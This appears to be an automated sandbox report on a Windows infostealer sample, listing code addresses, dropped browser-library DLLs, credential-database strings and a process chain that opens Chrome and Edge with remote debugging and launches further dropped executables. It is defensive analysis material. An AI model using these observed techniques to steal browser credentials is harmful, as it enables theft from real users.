Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB50820	0_2_6CB50820
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB8A820	0_2_6CB8A820
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBD4840	0_2_6CBD4840
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBC09B0	0_2_6CBC09B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB909A0	0_2_6CB909A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBBA9A0	0_2_6CBBA9A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CC1C9E0	0_2_6CC1C9E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB349F0	0_2_6CB349F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB56900	0_2_6CB56900
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB38960	0_2_6CB38960
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB7EA80	0_2_6CB7EA80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBB8A30	0_2_6CBB8A30
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBAEA00	0_2_6CBAEA00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB7CA70	0_2_6CB7CA70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBA0BA0	0_2_6CBA0BA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CC06BE0	0_2_6CC06BE0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CC2A480	0_2_6CC2A480
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB464D0	0_2_6CB464D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB9A4D0	0_2_6CB9A4D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB8A430	0_2_6CB8A430
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB64420	0_2_6CB64420
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB18460	0_2_6CB18460
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CAF45B0	0_2_6CAF45B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB8E5F0	0_2_6CB8E5F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBCA5E0	0_2_6CBCA5E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CC04540	0_2_6CC04540
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CC48550	0_2_6CC48550
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBA0570	0_2_6CBA0570
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB62560	0_2_6CB62560
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB58540	0_2_6CB58540
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB5E6E0	0_2_6CB5E6E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB9E6E0	0_2_6CB9E6E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB246D0	0_2_6CB246D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB5C650	0_2_6CB5C650
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB2A7D0	0_2_6CB2A7D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB80700	0_2_6CB80700
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB100B0	0_2_6CB100B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBDC0B0	0_2_6CBDC0B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CAF8090	0_2_6CAF8090
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBC8010	0_2_6CBC8010
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBCC000	0_2_6CBCC000
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB4E070	0_2_6CB4E070
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB001E0	0_2_6CB001E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB76130	0_2_6CB76130
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBE4130	0_2_6CBE4130
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB68140	0_2_6CB68140
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CC862C0	0_2_6CC862C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBCE2B0	0_2_6CBCE2B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBD22A0	0_2_6CBD22A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBD8220	0_2_6CBD8220
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBCA210	0_2_6CBCA210
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB88260	0_2_6CB88260
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB98250	0_2_6CB98250
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB5E3B0	0_2_6CB5E3B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB323A0	0_2_6CB323A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB543E0	0_2_6CB543E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB72320	0_2_6CB72320
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CC1C360	0_2_6CC1C360
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CC42370	0_2_6CC42370
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB02370	0_2_6CB02370
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB96370	0_2_6CB96370
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB08340	0_2_6CB08340
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CC3DCD0	0_2_6CC3DCD0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB9FC80	0_2_6CB9FC80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBC1CE0	0_2_6CBC1CE0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB11C30	0_2_6CB11C30
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CC29C40	0_2_6CC29C40
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB03C40	0_2_6CB03C40
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CAF3D80	0_2_6CAF3D80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CC49D90	0_2_6CC49D90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBD1DC0	0_2_6CBD1DC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB63D00	0_2_6CB63D00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB23EC0	0_2_6CB23EC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CC85E60	0_2_6CC85E60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CC5BE70	0_2_6CC5BE70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CC0DE10	0_2_6CC0DE10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CC1DFC0	0_2_6CC1DFC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CC83FC0	0_2_6CC83FC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB21F90	0_2_6CB21F90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBABFF0	0_2_6CBABFF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB35F20	0_2_6CB35F20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CAF5F30	0_2_6CAF5F30
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CC57F20	0_2_6CC57F20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CC5B8F0	0_2_6CC5B8F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBDF8F0	0_2_6CBDF8F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB0D8E0	0_2_6CB0D8E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB338E0	0_2_6CB338E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB9F8C0	0_2_6CB9F8C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB5D810	0_2_6CB5D810
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBD1990	0_2_6CBD1990
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB11980	0_2_6CB11980
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB659F0	0_2_6CB659F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB979F0	0_2_6CB979F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB399D0	0_2_6CB399D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB999C0	0_2_6CB999C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBB5920	0_2_6CBB5920
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CC4F900	0_2_6CC4F900
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB7F960	0_2_6CB7F960
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBBD960	0_2_6CBBD960
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBDDAB0	0_2_6CBDDAB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB01AE0	0_2_6CB01AE0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBFDA30	0_2_6CBFDA30
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CC89A50	0_2_6CC89A50
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB3FA10	0_2_6CB3FA10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBA1A10	0_2_6CBA1A10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBC9BB0	0_2_6CBC9BB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB59BA0	0_2_6CB59BA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBE5B90	0_2_6CBE5B90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CAF1B80	0_2_6CAF1B80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB47BF0	0_2_6CB47BF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB4BB20	0_2_6CB4BB20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBDFB60	0_2_6CBDFB60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB014E0	0_2_6CB014E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CC814A0	0_2_6CC814A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBE9430	0_2_6CBE9430
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	Code function: 16_2_009978BB	16_2_009978BB
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	Code function: 16_2_00997049	16_2_00997049
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	Code function: 16_2_00998860	16_2_00998860
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	Code function: 16_2_009931A8	16_2_009931A8
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	Code function: 16_2_00A681D3	16_2_00A681D3
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	Code function: 16_2_00A68101	16_2_00A68101
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	Code function: 16_2_00954B30	16_2_00954B30
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	Code function: 16_2_00954DE0	16_2_00954DE0
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	Code function: 16_2_00992D10	16_2_00992D10
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	Code function: 16_2_0099779B	16_2_0099779B
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	Code function: 16_2_00987F36	16_2_00987F36
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 17_2_00A578BB	17_2_00A578BB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 17_2_00A58860	17_2_00A58860
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 17_2_00A57049	17_2_00A57049
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 17_2_00A531A8	17_2_00A531A8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 17_2_00A14B30	17_2_00A14B30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 17_2_00A14DE0	17_2_00A14DE0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 17_2_00A52D10	17_2_00A52D10
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 17_2_00A5779B	17_2_00A5779B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 17_2_00A47F36	17_2_00A47F36
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 18_2_00A578BB	18_2_00A578BB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 18_2_00A58860	18_2_00A58860
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 18_2_00A57049	18_2_00A57049
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 18_2_00A531A8	18_2_00A531A8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 18_2_00A14B30	18_2_00A14B30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 18_2_00A14DE0	18_2_00A14DE0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 18_2_00A52D10	18_2_00A52D10
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 18_2_00A5779B	18_2_00A5779B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 18_2_00A47F36	18_2_00A47F36
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 20_2_00A1E530	20_2_00A1E530
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 20_2_00A36192	20_2_00A36192
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 20_2_00A58860	20_2_00A58860
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 20_2_00A14B30	20_2_00A14B30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 20_2_00A14DE0	20_2_00A14DE0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 20_2_00A52D10	20_2_00A52D10
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 20_2_00A30E13	20_2_00A30E13
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 20_2_00A57049	20_2_00A57049
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 20_2_00A531A8	20_2_00A531A8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 20_2_00A31602	20_2_00A31602
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 20_2_00A5779B	20_2_00A5779B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 20_2_00A578BB	20_2_00A578BB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 20_2_00A33DF1	20_2_00A33DF1
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 20_2_00A47F36	20_2_00A47F36

Dropped file seen in connection with other malware

Source: Joe Sandbox View	Dropped File: C:\ProgramData\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
Source: Joe Sandbox View	Dropped File: C:\ProgramData\mozglue.dll BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A

Found potential string decryption / allocating functions

Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	Code function: String function: 009680C0 appears 130 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: String function: 00A48E10 appears 47 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: String function: 00A2D64E appears 80 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: String function: 00A2D942 appears 86 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: String function: 00A2D663 appears 40 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: String function: 00A2DF80 appears 82 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: String function: 00A27A00 appears 38 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: String function: 00A280C0 appears 392 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6CB23620 appears 95 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6CC8D930 appears 57 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6CC809D0 appears 303 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6CC39F30 appears 51 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6CB29B10 appears 95 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6CC8DAE0 appears 72 times

Sample file is different than original file name gathered from version info

Source: file.exe, 00000000.00000002.2015458484.000000006FE52000.00000002.00000001.01000000.0000000A.sdmp	Binary or memory string: OriginalFilenamemozglue.dll0 vs file.exe
Source: file.exe, 00000000.00000002.2014762713.000000006CCD5000.00000002.00000001.01000000.00000009.sdmp	Binary or memory string: OriginalFilenamenss3.dll0 vs file.exe

Uses 32bit PE files

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: random[1].exe.20.dr	Static PE information: Section: ZLIB complexity 0.997977368772242
Source: random[1].exe.20.dr	Static PE information: Section: kgsecyxg ZLIB complexity 0.9945889506242479
Source: 5762ea743c.exe.20.dr	Static PE information: Section: ZLIB complexity 0.997977368772242
Source: 5762ea743c.exe.20.dr	Static PE information: Section: kgsecyxg ZLIB complexity 0.9945889506242479

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@39/61@9/9

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6CB60300 MapViewOfFile,GetLastError,FormatMessageA,PR_LogPrint,GetLastError,PR_SetError,

0_2_6CB60300

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\OFRH31K3.htm

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8188:120:WilError_03

Source: C:\Users\user\Documents\KJJJKFIIIJ.exe

File created: C:\Users\user\AppData\Local\Temp\abc3bc1985

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: file.exe, 00000000.00000002.2013954861.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2007520480.000000001D502000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2014595632.000000006CC8F000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: file.exe, 00000000.00000002.2013954861.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2007520480.000000001D502000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2014595632.000000006CC8F000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: file.exe, 00000000.00000002.2013954861.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2007520480.000000001D502000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2014595632.000000006CC8F000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: file.exe, 00000000.00000002.2013954861.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2007520480.000000001D502000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2014595632.000000006CC8F000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: file.exe, file.exe, 00000000.00000002.2013954861.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2007520480.000000001D502000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2014595632.000000006CC8F000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: file.exe, 00000000.00000002.2013954861.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2007520480.000000001D502000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: file.exe, 00000000.00000002.2013954861.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2007520480.000000001D502000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2014595632.000000006CC8F000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: file.exe, 00000000.00000003.1599724140.000000001D405000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1738817732.000000001D3F9000.00000004.00000020.00020000.00000000.sdmp, DAEGIDHDHIDGIEBGIJEH.0.dr, EBFHJEGDAFHIJKECFBKJ.0.dr	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: file.exe, 00000000.00000002.2013954861.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2007520480.000000001D502000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: file.exe, 00000000.00000002.2013954861.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2007520480.000000001D502000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;

Source: file.exe

ReversingLabs: Detection: 47%

Source: file.exe	String found in binary or memory: /addC)
Source: file.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: file.exe	String found in binary or memory: 6RtlAllocateHeap3Cannot find '%s'. Please, re-install this applicationThunRTMain__vbaVarTstNeh

Source: unknown	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2328 --field-trial-handle=2084,i,15082746672518523759,5591991654557497421,262144 /prefetch:8
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory=""
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2440 --field-trial-handle=2236,i,13354329722629723967,17457331017763836313,262144 /prefetch:3
Source: unknown	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2304 --field-trial-handle=2272,i,9092242746492624172,9017713632823041127,262144 /prefetch:3
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\Documents\KJJJKFIIIJ.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\Documents\KJJJKFIIIJ.exe "C:\Users\user\Documents\KJJJKFIIIJ.exe"
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1012783001\5762ea743c.exe "C:\Users\user\AppData\Local\Temp\1012783001\5762ea743c.exe"
